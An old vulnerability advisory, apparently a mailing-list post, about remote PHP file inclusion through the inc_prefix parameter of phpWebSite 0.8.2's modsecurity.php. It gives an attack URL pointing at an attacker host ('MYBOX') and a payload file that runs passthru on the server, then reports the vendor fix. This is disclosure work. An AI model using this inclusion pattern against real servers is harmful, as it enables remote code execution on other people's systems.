-------------------------------------- | PHP source injection in phpWebSite | -------------------------------------- Product Description =================== phpWebSite is written in the PHP Programming Language, making it ideal for developers to write customized plug-ins. PHP is a server side programming language that is simple, cross-platform, and fast. It can be found at http://phpwebsite.appstate.edu Tested version ============== Stable - 0.8.2 (modsecurity.php version < 1.10) The Problem =========== phpWebSite commes with a file called modsecurity.php, and looks like this: -------- modsecurity.php -------- <?php global $inc_prefix; if(!$inc_prefix) { ... } ... include_once($inc_prefix."htmlheader.php"); ?> ---------------------------------- If someone request a URL like http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/, the htmlheader.php file from MYBOX would be included, and the attacker would be able to include any code he wants. Examples ======== http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/ --- htmlheader.php --- <? passthru("/bin/ls") ?> ---------------------- Output: dir listing of the current dierctory Sollution ========= I informed the vendor and they released a new version (1.11) of the modsecurity.php file wich is avaiable from: http://res1.stddev.appstate.edu/horde/chora/cvs.php/phpwebsite A new version (0.8.3) is released so this vulnerability so new users will never have a modsecurity.php file older then version 1.11 ------------------------------ Tim Vandermeersch Tim.Vandermeersch@pandora.be http://users.pandora.be/tim/
